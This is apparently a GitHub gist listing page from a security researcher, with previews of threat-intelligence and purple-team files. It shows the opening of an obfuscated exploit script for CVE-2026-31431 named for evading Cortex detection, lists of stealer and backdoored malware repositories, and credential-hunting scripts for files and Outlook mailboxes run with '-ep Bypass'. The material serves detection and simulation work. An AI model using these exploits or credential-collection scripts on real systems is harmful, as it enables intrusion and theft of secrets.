mthcht
/ CVE-2026-31431_bypassing_cortex_detection.py
Created
May 6, 2026 10:01
CVE-2026-31431_bypassing_cortex_detection.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import os as g, zlib, socket as s | |
| def d(x): | |
| return bytes.fromhex(x) | |
| def c(f, t, c): | |
| a = s.socket(38, 5, 0) | |
| a.bind(("aead", "authencesn(hmac(sha256),cbc(aes))")) | |
| h = 279 | |
| v = a.setsockopt | |
| v(h, 1, d("0800010000000010" + "0" * 64)) |
mthcht
/ sources.list
Created
November 5, 2025 10:14
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| deb http://deb.debian.org/debian trixie main contrib non-free non-free-firmware | |
| deb http://deb.debian.org/debian trixie-updates main contrib non-free non-free-firmware | |
| deb http://security.debian.org/debian-security trixie-security main contrib non-free non-free-firmware | |
| deb https://deb.debian.org/debian trixie-backports main contrib non-free non-free-firmware |
mthcht
/ gist:4b16ef0cf87df362b1ed90cb84ff0733
Created
May 24, 2025 14:40
Lumma Stealer sinkholed domains
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| extracted from microsft NS https://github.com/mthcht/awesome-lists/tree/main/Lists/Domains/sinkholed_servers | |
| 701easter.shop | |
| bambamboo.shop | |
| freshredfish00.shop | |
| freshredfish01.shop | |
| freshredfish02.shop | |
| freshredfish03.shop | |
| freshredfish04.shop | |
| freshredfish05.shop |
mthcht
/ GetTracelogProviderSecurity.ps1
Created
February 23, 2025 16:36
— forked from olafhartong/GetTracelogProviderSecurity.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ### USAGE: | |
| ### | |
| ### GetTracelogProviderSecurity.ps1 (to get all provider info) | |
| ### | |
| ### GetTracelogProviderSecurity.ps1 -ProviderName f2e68291-2367-5d51-3488-46f7a0e3f2cf | |
| ### (to get the info for 1 provider guid) | |
| ## | |
| # | |
| # Provider: f2e68291-2367-5d51-3488-46f7a0e3f2cf | |
| # Control Flags: 45076 |
mthcht
/ Github Stealer repos topics 20241215
Created
December 15, 2024 13:17
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [ | |
| { | |
| "url": "https://github.com/Fadi002/unshackle", | |
| "topics": [ | |
| "linux", | |
| "password-crack", | |
| "windows", | |
| "bypass-password", | |
| "linux-password-bypass", | |
| "unshackle", |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://github.com/UnamSanctam/SilentCryptoMiner | |
| https://github.com/maxDcb/C2Implant | |
| https://github.com/Peaky-XD/webshell | |
| https://github.com/soufianetahiri/Anxun-isoon | |
| https://github.com/mlcsec/FormThief | |
| https://github.com/I-S00N/I-S00N | |
| https://github.com/phra/PEzor | |
| https://github.com/Meltedd/HVNC | |
| https://github.com/henriksb/ExtensionSpoofer | |
| https://github.com/xvt-void/EnableAllTokenPrivs |
mthcht
/ malicious_backdoored_github_repos.txt
Last active
February 16, 2024 07:57
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| kstetacy44/Ddos-Tool | |
| jebssicaTgVonzalez/doc-macro-exploit | |
| kstetacy44/lichess-cheat | |
| maqrtineLzjulyie/spotify-check-premium | |
| jesusCmkurpBhy/windows-activation-key-gen | |
| XgibbsjDakmes/YouTube-Report-bot | |
| cannUondSebor5ah/file-extension-spoofer | |
| johnsonrreTMbecca/league-of-legends-account-gen | |
| m3i8cshealmartin/ransomware-builder | |
| cesa2rmcxdonanld/twitch-mass-account-generator |
mthcht
/ malicious_github_users.txt
Last active
February 15, 2024 09:37
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| jreynbolfdks | |
| pierbrcematthewK | |
| gelloisk7 | |
| 0phillipskaMpyla | |
| savanHnahw0ils8on | |
| owenMssh6errdy | |
| ng9arciaTa | |
| vjonathanY5u4 | |
| tmannukQ | |
| christophermitqchellVg |
mthcht
/ search_for_credentials_in_files.ps1
Created
January 8, 2023 22:44
Search for given keywords in every file in the given directory (equivalent of a grep -rnw "mystring" .)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| T1552.001 - Unsecured Credentials: Credentials In Files | |
| T1083 - File and Directory Discovery | |
| Script from https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/System/search_for_credentials_in_files.ps1 | |
| Simple script to search for strings inside files in a given directory (equivalent to a grep -rnw "mystring" .) | |
| Example usage: | |
| search for 'password=' in every files in the current directory and save the result in results.txt in the same directory | |
| - powershell.exe -ep Bypass -File .\search_for_credentials_in_files.ps1 -search 'password=' -path . -out ./results.txt | |
| Ask for user input and print results in the console | |
| - powershell.exe -ep Bypass -File .\search_for_credentials_in_files.ps1 |
mthcht
/ search_keywords_in_outlook_mailbox.ps1
Created
January 8, 2023 20:52
Extract sensitive content from outlook mailbox
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| T1114.001 - Email Collection: Local Email Collection | |
| T1555 - Credentials from Password Stores | |
| Script from https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/Outlook/search_keywords_in_outlook_mailbox.ps1 | |
| Search in outlook mailbox for specific keywords or default keywords like passwords, license, api key, tokens stored in email for example. | |
| #> | |
| param( | |
| [Parameter(Mandatory=$false)] | |
| [switch]$all, |
NewerOlder